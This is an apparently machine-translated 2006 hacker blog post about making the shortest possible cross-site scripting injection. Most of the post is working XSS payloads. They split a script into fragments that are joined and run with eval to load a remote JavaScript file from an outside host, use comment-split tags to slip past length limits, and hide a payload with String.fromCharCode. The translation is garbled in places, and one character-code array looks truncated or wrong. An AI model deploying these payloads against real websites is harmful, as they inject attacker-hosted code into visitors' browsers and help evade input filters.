On that day, I asked, What is the shortest cross-site statement? To put it in the past, I will definitely think this way, normally cross-siteCode: <SCRIPT> alert ("A") </SCRIPT>. Check that there are 27 characters in total. Hey, but I saw one of them in the hacker manual.Article, Crazy cross-site trip, which mentions another method of cross-site statement:
<SCRIPT> Z = 'document. '</SCRIPT>
<SCRIPT> Z = z + 'write ("'</SCRIPT>
<SCRIPT> Z = z + '<SCRIPT' </SCRIPT>
<SCRIPT> Z = z + 'src = HT '</SCRIPT>
<SCRIPT> Z = z + 'tp: // WW '</SCRIPT>
<SCRIPT> Z = z + 'W. pc010 '</SCRIPT>
<SCRIPT> Z = z + '. CN/1.' </SCRIPT>
<SCRIPT> Z = z + 'js> </SC '</SCRIPT>
<SCRIPT> Z = z + 'ript> ") '</SCRIPT>
<SCRIPT> eval (z) </SCRIPT>
Write these statements separately. As long as the written statements are displayed on a page, the code is finally introduced into variable Z, and the total one is:
Document. Write ("<SCRIPT src = http://www.pc010.cn/1.js> </SCRIPT> ")
Then run the Z variable using the eval () function to execute the cross-site effect. LCX commented in the article that the minimum valid code can be 26 letters, namely <SCRIPT> Z = z + 'd "'</SCRIPT>, the minimum cross-site length is 26 characters. (When searching for information on the Internet today, we found that this method can contain only one character, namely: <SCRIPT> Z + = 'd "'</SCRIPT>, replace = z + with + =. Hey, you can reduce the number of characters by 25 characters. However, it seems sad that I can only make breakthroughs on the foundation of others! :(). After replying to Jianxin, he turned back to a smiling face. I felt this guy had to find a shorter cross-site method. /Jmdcw/
Sure enough, today I opened phpwind vulnerability in the Ninth Issue of hackers' manual (for some reason, I haven't carefully read the book for a long time) and mentioned the shorter cross-site code, as follows:
<SCRIPT> open (/*
*/"Http: // 127 "/*
*/+ ". 0.0.1 /"/*
*/) </SCRIPT>
Here, the/* and */are the script's Annotation statements, which are submitted separately. The same condition is that the submitted code must be on a page, as shown in the following figure:
<SCRIPT> open (/* Invalid Content not displayed */"http: // 127"/* Invalid Content not displayed */+ ". 0.0.1/"/* Invalid Content not displayed */) </SCRIPT>
So what is the shortest statement? It seems that <SCRIPT> cannot be used separately. Apart from this, functions defined by the script, such as open, cannot run normally even after being separated./jmdcw,
First convert the top statement: Document. Write ("<SCRIPT src = http://www.pc010.cn/1.js> </SCRIPT>") to a 10-digit representation character:
100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116, 62,34, 41,59
Then add string with eval. execute fromcharcode: <SCRIPT> eval (string. fromcharcode (100,111, 99,117,109,101,110,116, 46,119,114,105,116,101, 60,115, 99,114,105,112,116, 32,115,114, 104,116,116,112, 47,119,119,119, 46,112, 106,115, 47,115, 99,114,105,112,116,) </SCRIPT>
The following uses the Jianxin Method for Splitting:
<SCRIPT> /*
*/Eval (/*
*/String /*
*/./*
*/Fromcharcode /*
*/(100 ,/*
*/111,99 ,/*
*/......./*
*/59 ))/*
*/</SCRIPT>
.... The longest statement is */fromcharcode/*, 16 characters, because this is the function name reserved by the script, it can be seen that the smallest cross-site statement is determined by the function used.
By lonely hedgehog
2006-12-10